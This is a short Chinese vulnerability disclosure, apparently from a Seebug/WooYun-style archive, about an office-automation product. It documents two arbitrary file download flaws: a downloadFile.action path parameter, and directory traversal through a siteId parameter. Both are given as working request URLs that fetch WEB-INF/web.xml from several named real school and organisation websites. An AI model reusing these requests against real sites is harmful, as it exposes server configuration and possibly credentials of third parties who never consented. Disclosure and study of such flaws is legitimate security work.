### 简要描述:
两处。
### 详细说明:
看样式对比,应该是官网这个产品:
http://www.threeoa.com/product/501.html
案例应该还是不少的!
第一处下载:
http://www.jmsyz.net/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
[<img src="https://images.seebug.org/upload/201406/26163044bcbd7e3fe5519ecb3ccd679c4ca04bf4.jpg" alt="d1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/26163044bcbd7e3fe5519ecb3ccd679c4ca04bf4.jpg)
http://jdyz.ijd.cn/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
http://www.wxxqml.com/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
http://www.sxxazx.com:2012/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
### 漏洞证明:
第二处下载:
http://www.jmsyz.net/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
[<img src="https://images.seebug.org/upload/201406/26163435c0df20b795ec1107778802be29d882c2.jpg" alt="d2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/26163435c0df20b795ec1107778802be29d882c2.jpg)
替换为上面第一处的几个域名都是OK的。
京公网安备 11010502034610号
暂无评论